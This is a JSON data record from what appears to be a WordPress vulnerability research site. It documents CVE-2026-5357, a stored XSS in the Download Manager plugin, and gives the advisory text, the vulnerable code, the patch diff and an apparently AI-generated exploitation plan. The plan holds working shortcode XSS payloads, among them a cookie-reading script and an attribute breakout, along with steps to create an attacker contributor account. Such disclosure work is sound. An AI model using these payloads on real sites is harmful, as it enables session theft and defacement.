[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRjP59mKvBEae93Ys371r4dElXiqqsOVcnpV6E6TE8yQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"source_links":37},"CVE-2026-5357","download-manager-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Download Manager \u003C= 3.3.52 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sid' parameter of the 'wpdm_members' shortcode in versions up to and including 3.3.52. This is due to insufficient input sanitization and output escaping on the user-supplied 'sid' shortcode attribute. The sid parameter is extracted without sanitization in the members() function and stored via update_post_meta(), then echoed directly into an HTML id attribute in the members.php template without applying esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page.","download-manager",null,"\u003C=3.3.52","3.3.53","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-08 13:33:28","2026-04-09 02:25:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F27fc81b0-c03a-4de7-bc38-791401d1685b?source=api-prod",1,[22,23,24,25],"download-manager.php","readme.txt","src\u002FUser\u002FUser.php","src\u002F__\u002FCronJobs.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-5357\n\n## 1. Vulnerability Summary\nThe **Download Manager** plugin (\u003C= 3.3.52) contains a stored cross-site scripting (XSS) vulnerability within the `[wpdm_members]` and `[wpdm_authors]` shortcodes. The vulnerability arises because the `sid` attribute (shortcode ID) is extracted without sanitization in the `members()` function of the `WPDM\\User\\User` class. This value is subsequently stored in post metadata via `update_post_meta()` and, more critically, rendered directly into an HTML `id` attribute within the `members.php` template without any output escaping (such as `esc_attr()`).\n\n## 2. Attack Vector Analysis\n- **Shortcode:** `[wpdm_members]` or `[wpdm_authors]`.\n- **Vulnerable Attribute:** `sid`.\n- **Authentication Level:** Contributor+ (any user with the `edit_posts` capability who can use shortcodes).\n- **Preconditions:** The attacker must be able to create or edit a post\u002Fpage and insert a shortcode.\n- **Payload Delivery:** The payload is delivered by saving a post containing the malicious shortcode. Execution occurs when any user (including administrators) views the post.\n\n## 3. Code Flow\n1.  **Entry Point:** `src\u002FUser\u002FUser.php`: `WPDM\\User\\User::__construct()` registers the shortcodes:\n    ```php\n    add_shortcode('wpdm_members', [$this, 'members']);\n    add_shortcode('wpdm_authors', [$this, 'members']);\n    ```\n2.  **Processing Source:** `src\u002FUser\u002FUser.php`: `WPDM\\User\\User::members($params)`:\n    ```php\n    function members($params = array())\n    {\n        $sid = isset($params['sid']) ? $params['sid'] : '';\n        \u002F\u002F Storage sink (side-effect)\n        update_post_meta(get_the_ID(), '__wpdm_users_params' . $sid, $params);\n        ob_start();\n        \u002F\u002F Template inclusion\n        include Template::locate(\"members.php\", __DIR__.'\u002Fviews');\n        return ob_get_clean();\n    }\n    ```\n3.  **Sink:** `src\u002FUser\u002Fviews\u002Fmembers.php` (inferred from description):\n    The template uses the `$sid` variable directly inside an HTML attribute:\n    ```html\n    \u003Cdiv id=\"wpdm-members-\u003C?php echo $sid; ?>\"> \n    ```\n    Since `$sid` is taken directly from the `$params` array passed to the shortcode handler, an attacker can inject a breakout sequence.\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required.** \nShortcodes are executed by the WordPress core `do_shortcode()` function when a post's content is rendered. The \"storage\" occurs as a side effect of rendering the shortcode (`update_post_meta` is called inside the shortcode handler). Therefore, the only \"request\" needed to store and trigger the XSS is the standard post creation\u002Fedit request, which is protected by standard WordPress `_wpnonce` for post editing, but once the post is published, the vulnerability triggers for every viewer without further authentication or nonces.\n\n## 5. Exploitation Strategy\n### Step 1: Create a Post with a Malicious Shortcode\nUse a Contributor account to create a post containing the XSS payload.\n\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fpost-new.php`\n- **Method:** `POST` (via `http_request` or automation tool to simulate the Save\u002FPublish action).\n- **Payload:**\n  ```text\n  [wpdm_members sid='\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']\n  ```\n  *Alternative payload for attribute breakout:*\n  ```text\n  [wpdm_members sid='x\" onmouseover=\"alert(1)\" style=\"width:1000px;height:1000px;display:block;\"']\n  ```\n\n### Step 2: View the Post\nNavigate to the URL of the newly created post.\n\n- **URL:** `http:\u002F\u002F[target]\u002F?p=[POST_ID]`\n- **Action:** Render the page content.\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    - Create a user with the **Contributor** role using WP-CLI:\n      `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2.  **Plugin Activation:**\n    - Ensure `download-manager` version 3.3.52 is active.\n\n## 7. Expected Results\n- Upon viewing the post, the HTML source should contain a broken `id` attribute similar to:\n  `\u003Cdiv id=\"wpdm-members-\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>\">`\n- A JavaScript alert box showing the user's cookies should appear in the browser.\n\n## 8. Verification Steps\n1.  **Check Post Meta:** Verify that the malicious `sid` was used in a meta key:\n    `wp post meta list [POST_ID]`\n    Look for a key starting with `__wpdm_users_params`.\n2.  **Inspect HTML Output:**\n    Use `browser_navigate` to the post and `browser_eval` to check for the script:\n    `browser_eval(\"document.querySelector('script').textContent.includes('alert')\")`\n\n## 9. Alternative Approaches\nIf the `sid` is sanitized before storage but not before output (unlikely given the code), attempt to use other parameters in the `$params` array if they are also echoed in `members.php`.\nParameters to test: `cols`, `items_per_page`, `role`.\n\nIf `wpdm_members` doesn't render as expected, try the alias:\n`[wpdm_authors sid='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\nIf the site uses the Block Editor (Gutenberg), the payload can be inserted via a \"Shortcode\" block or a \"Classic\" block. The underlying storage mechanism remains `post_content`.","The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sid' attribute of the [wpdm_members] and [wpdm_authors] shortcodes. Authenticated attackers with contributor-level permissions can inject arbitrary web scripts into pages that execute when users view the affected content, due to insufficient sanitization and escaping of the shortcode ID parameter.","\u002F\u002F src\u002FUser\u002FUser.php\n\nfunction members($params = array())\n{\n    $sid = isset($params['sid']) ? $params['sid'] : ''; \u002F\u002F Line 175: No sanitization of user-supplied sid\n    update_post_meta(get_the_ID(), '__wpdm_users_params' . $sid, $params);\n    ob_start();\n    include Template::locate(\"members.php\", __DIR__.'\u002Fviews');\n    return ob_get_clean();\n}\n\n---\n\n\u002F\u002F src\u002FUser\u002FUser.php (within listAuthors context)\n\nif (!$params) $params = get_post_meta(wpdm_query_var('_pid', 'int'), '__wpdm_users_params' . wpdm_query_var('_sid'), true); \u002F\u002F Line 187: Unsanitized use of _sid query variable","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-manager\u002F3.3.52\u002Fsrc\u002FUser\u002FUser.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-manager\u002F3.3.53\u002Fsrc\u002FUser\u002FUser.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-manager\u002F3.3.52\u002Fsrc\u002FUser\u002FUser.php\t2026-01-04 02:25:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-manager\u002F3.3.53\u002Fsrc\u002FUser\u002FUser.php\t2026-04-08 04:20:26.000000000 +0000\n@@ -172,7 +172,8 @@\n \n     function members($params = array())\n     {\n-        $sid = isset($params['sid']) ? $params['sid'] : '';\n+        $sid = isset($params['sid']) ? preg_replace('\u002F[^a-zA-Z0-9_\\-]\u002F', '', $params['sid']) : '';\n+        $params['sid'] = $sid;\n         update_post_meta(get_the_ID(), '__wpdm_users_params' . $sid, $params);\n         ob_start();\n         include Template::locate(\"members.php\", __DIR__.'\u002Fviews');\n@@ -183,7 +184,7 @@\n \n     {\n \n-        if (!$params) $params = get_post_meta(wpdm_query_var('_pid', 'int'), '__wpdm_users_params' . wpdm_query_var('_sid'), true);\n+        if (!$params) $params = get_post_meta(wpdm_query_var('_pid', 'int'), '__wpdm_users_params' . preg_replace('\u002F[^a-zA-Z0-9_\\-]\u002F', '', wpdm_query_var('_sid')), true);\n         $page = isset($_REQUEST['cp']) && $_REQUEST['cp'] > 0 ? (int)$_REQUEST['cp'] : 1;\n         $items_per_page = isset($params['items_per_page']) ? $params['items_per_page'] : 12;\n         \u002F\u002F$offset = $page * $items_per_page;","The exploit is achieved by an authenticated user (Contributor or higher) creating a post or page and inserting a malicious shortcode. The attacker sets the 'sid' attribute of the [wpdm_members] or [wpdm_authors] shortcode to contain a payload designed to break out of an HTML attribute (e.g., sid='\">\u003Cscript>alert(1)\u003C\u002Fscript>'). When the post is rendered, the handler in User.php processes the unsanitized 'sid' and includes the members.php template, which reflects the 'sid' value directly into an HTML element's 'id' attribute without escaping, leading to script execution in the viewer's browser.","gemini-3-flash-preview","2026-04-16 16:28:01","2026-04-16 16:28:23",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.3.52","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags\u002F3.3.52","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager.3.3.52.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags\u002F3.3.53","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager.3.3.53.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags"]